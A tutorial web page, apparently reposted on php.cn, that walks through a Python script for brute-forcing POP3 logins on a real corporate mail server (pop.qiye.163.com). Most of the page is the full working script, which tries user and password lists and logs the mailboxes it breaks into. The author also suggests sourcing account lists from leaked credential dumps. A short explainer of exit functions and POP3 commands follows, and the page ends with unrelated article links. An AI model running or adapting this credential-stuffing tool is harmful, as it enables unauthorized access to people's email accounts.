Python creates a blasting script for corporate mailboxes-Python Tutorial-php.cn

Home

Backend Development

Python Tutorial

Python creates a blasting script for corporate mailboxes

高洛峰

Feb 06, 2017 pm 02:00 PM

According to the task given by the master, I wrote a blasting script for corporate mailboxes, followed by some blasting scripts such as FTP and SSH.

Let me talk about the overall idea first:

The overall idea is to use python's poplib module to interact from the pop3 server and generate results based on the relevant information obtained. The POP3 protocol is not complicated. It also adopts a question-and-answer method. If you send a command to the server, the server will definitely reply with a message.

1. First verify whether the parameters are correct

Sys.argv[] is used to obtain command line parameters. sys.argv[0] represents the file path of the code itself, so the parameters start from 1

2. Then read from the user password file Get information
3.pop.getwelcome() is used to get the response status of the connection server
4.Then comes the core code part of the script

server = "pop.qiye.163.com" //设置pop3服务器地址
pop = poplib.POP3(server,110) //连接pop3服务器
pop.user(user) //验证用户名
auth = pop.pass_(passwd) //验证密码
if auth.split(&#39; &#39;)[0]== "+OK": //判断响应的结果是否“OK”
 pring user,passwd

5.Finally output the relevant user information

The script code is as follows:

#!/usr/bin/python
# -*- coding: UTF-8 -*-
&#39;&#39;&#39;
@Author：joy_nick
@博客：http://byd.dropsec.xyz/
@Email Pop3 Brute Forcer
&#39;&#39;&#39;
 
import threading, time, random, sys, poplib
from copy import copy
 
if len(sys.argv) !=3:
 print "\t --------------------------------------------------\n"
 print "\t Usage: ./Emailpopbrute.py <userlist> <passlist>\n"
 sys.exit(1)
 
server = "pop.qiye.163.com"
success = []
 
try:
 users = open(sys.argv[1], "r").readlines()
except(IOError):
 print "[-] Error: urerlist打开失败!\n"
 sys.exit(1)
 
try:
 words = open(sys.argv[2], "r").readlines()
except(IOError):
 print "[-] Error: passlist打开失败!\n"
 sys.exit(1)
try:
 pop = poplib.POP3(server,110)
 welcome = pop.getwelcome()
 print welcome
 pop.quit()
except (poplib.error_proto):
 welcome = "No Response"
 pass
 
def mailbruteforce(listuser,listpwd):
 if len(listuser) < 1 or len(listpwd) < 1 :
 print "An error occurred: No user or pass list"
 return 1
 for user in listuser:
 for value in listpwd :
 user = user.replace("\n","")
 value = value.replace("\n","")
 try:
 print "-"*12
 print "[+] User:",user,"Password:",value
 time.sleep(1)
 pop = poplib.POP3(server,110)
 pop.user(user)
 auth = pop.pass_(value)
 print auth
 if auth.split(&#39; &#39;)[0]!= "+OK" :
 pop.quit()
 print "unknown error !"
 continue
 if pop.stat()[1] is None or pop.stat()[1] < 1 :
 pop.quit()
 print "获取信息失败!"
 continue
 ret = (user,value,pop.stat()[0],pop.stat()[1])
 success.append(ret)
 pop.quit()
 break
 except:
 #print "An error occurred:", msg
 pass
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
mailbruteforce(users,words)
 
print "\t[+] have weakpass :\t",len(success)
if len(success) >=1:
 for ret in success:
 print "\n\n[+] Login successful:",ret[0], ret[1]
 print "\t[+] Mail:",ret[2],"emails"
 print "\t[+] Size:",ret[3],"bytes\n"
print "\n[-] Done"

Test results:

Python creates a blasting script for corporate mailboxes

Description:

The user dictionary file requires @domain.com, Similar to zhangsan@domain.com, lisi@domain.com, wangwu@domain.com. Since I don’t have a corporate email account and password, I didn’t test it successfully. If you are interested, you can search for relevant social work pants.

Attachment:

What is the difference between os._exit(), sys.exit(), and exit() in python?

sys.exit(n) Exiting the program triggers a SystemExit exception, which can be caught to perform some cleanup work. The default value of n is 0, indicating a normal exit. Others are abnormal exits. If this exception is not caught, it will be directly Exit; catching this exception can do some additional cleanup work. Generally, this exit

os._exit(n) is used in the main program to exit the Python interpreter directly. The subsequent code will not be executed, no exception will be thrown, and no related cleanup work will be performed. It is often used for the exit of child processes. .

exit() should be the same as exit() in other languages such as C language

The process of receiving emails in pop3 is generally:

Connect to the pop3 server (poplib.POP3.__init__)

Send user name and password for verification (poplib.POP3.user poplib.POP3.pass_)

Get the message information in the mailbox (poplib.POP3.stat)

Receive mail(poplib.POP3.retr)

Delete mail(poplib.POP3.dele)

Exit(poplib.POP3.quit)

Command poplib method parameter status description
------------------------------------------ -------------------------------------------------- ------
USER user username approves the user name. If this command and the following pass command are successful, it will cause state transition
PASS pass_ password approves the user password
APOP apop Name,Digest approves the Digest is MD5 message summary
-------------------------------------------------- -------------------------------------------------- -
STAT stat None Processes the request server to send back statistics about the mailbox, such as the total number of emails and the total number of bytes
UIDL uidl [Msg#] Processes the unique identifier of the returned email, each identifier of the POP3 session will be unique
LIST list [Msg#] Process returns the number of messages and the size of each message
RETR retr [Msg#] Processes returns the full text of the message identified by the parameter
DELE dele [Msg #] The processing server will mark the messages identified by the parameter as deleted, executed by the quit command
RSET rset None The processing server will reset all messages marked for deletion, used to undo the DELE command
TOP top [Msg#] processing The server will return the first n lines of the email identified by the parameter, n must be a positive integer
NOOP noop None The processing server returns a positive response

For more related articles about python making corporate mailbox blasting scripts, please pay attention to PHP Chinese website!

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

How to solve the permissions problem encountered when viewing Python version in Linux terminal?Apr 01, 2025 pm 05:09 PM

Solution to permission issues when viewing Python version in Linux terminal When you try to view Python version in Linux terminal, enter python...

How Do I Use Beautiful Soup to Parse HTML?Mar 10, 2025 pm 06:54 PM

This article explains how to use Beautiful Soup, a Python library, to parse HTML. It details common methods like find(), find_all(), select(), and get_text() for data extraction, handling of diverse HTML structures and errors, and alternatives (Sel

Serialization and Deserialization of Python Objects: Part 1Mar 08, 2025 am 09:39 AM

Serialization and deserialization of Python objects are key aspects of any non-trivial program. If you save something to a Python file, you do object serialization and deserialization if you read the configuration file, or if you respond to an HTTP request. In a sense, serialization and deserialization are the most boring things in the world. Who cares about all these formats and protocols? You want to persist or stream some Python objects and retrieve them in full at a later time. This is a great way to see the world on a conceptual level. However, on a practical level, the serialization scheme, format or protocol you choose may determine the speed, security, freedom of maintenance status, and other aspects of the program

Mathematical Modules in Python: StatisticsMar 09, 2025 am 11:40 AM

Python's statistics module provides powerful data statistical analysis capabilities to help us quickly understand the overall characteristics of data, such as biostatistics and business analysis. Instead of looking at data points one by one, just look at statistics such as mean or variance to discover trends and features in the original data that may be ignored, and compare large datasets more easily and effectively. This tutorial will explain how to calculate the mean and measure the degree of dispersion of the dataset. Unless otherwise stated, all functions in this module support the calculation of the mean() function instead of simply summing the average. Floating point numbers can also be used. import random import statistics from fracti

How to Perform Deep Learning with TensorFlow or PyTorch?Mar 10, 2025 pm 06:52 PM

This article compares TensorFlow and PyTorch for deep learning. It details the steps involved: data preparation, model building, training, evaluation, and deployment. Key differences between the frameworks, particularly regarding computational grap

Scraping Webpages in Python With Beautiful Soup: Search and DOM ModificationMar 08, 2025 am 10:36 AM

This tutorial builds upon the previous introduction to Beautiful Soup, focusing on DOM manipulation beyond simple tree navigation. We'll explore efficient search methods and techniques for modifying HTML structure. One common DOM search method is ex

How to Create Command-Line Interfaces (CLIs) with Python?Mar 10, 2025 pm 06:48 PM

This article guides Python developers on building command-line interfaces (CLIs). It details using libraries like typer, click, and argparse, emphasizing input/output handling, and promoting user-friendly design patterns for improved CLI usability.

What are some popular Python libraries and their uses?Mar 21, 2025 pm 06:46 PM

The article discusses popular Python libraries like NumPy, Pandas, Matplotlib, Scikit-learn, TensorFlow, Django, Flask, and Requests, detailing their uses in scientific computing, data analysis, visualization, machine learning, web development, and H

See all articles